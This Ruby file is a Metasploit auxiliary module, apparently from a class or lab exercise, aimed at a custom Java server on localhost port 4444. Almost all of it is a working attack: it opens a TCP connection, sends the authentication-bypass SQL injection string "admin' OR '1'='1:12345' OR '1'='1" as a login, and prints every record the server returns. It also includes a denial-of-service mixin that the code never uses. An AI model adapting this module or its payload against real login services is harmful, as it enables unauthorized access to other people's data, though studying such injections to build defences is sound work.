require 'msf/core'


class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::Remote::Tcp
	include Msf::Auxiliary::Dos

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Custom SQL Injection',
			'Description'    => %q{
				This module triggers a SQL Injection on a custom-made Java server.
			},
			'Author' 		=> [ 'Arsalan Ahmed, Robert Hall, Michael Longchamps' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 0001 $',
			'DisclosureDate' => 'Apr 18 2011'))

		register_options(
			[
				Opt::RHOST('localhost'),
				Opt::RPORT(4444),
			], self.class)

	end

	def run
		print_status("Establishing connection to server...")
		connect
		print_status("Connection successful!")
		print_status("Sending SQL Injection string...")
		sploit = "admin' OR '1'='1:12345' OR '1'='1"
		print_status("SQL Injected. Retrieving records...")
		sock.put(sploit + "\r\n")
		while line = sock.gets 
 			print_line line.chop      	
		end
		disconnect
	end

end
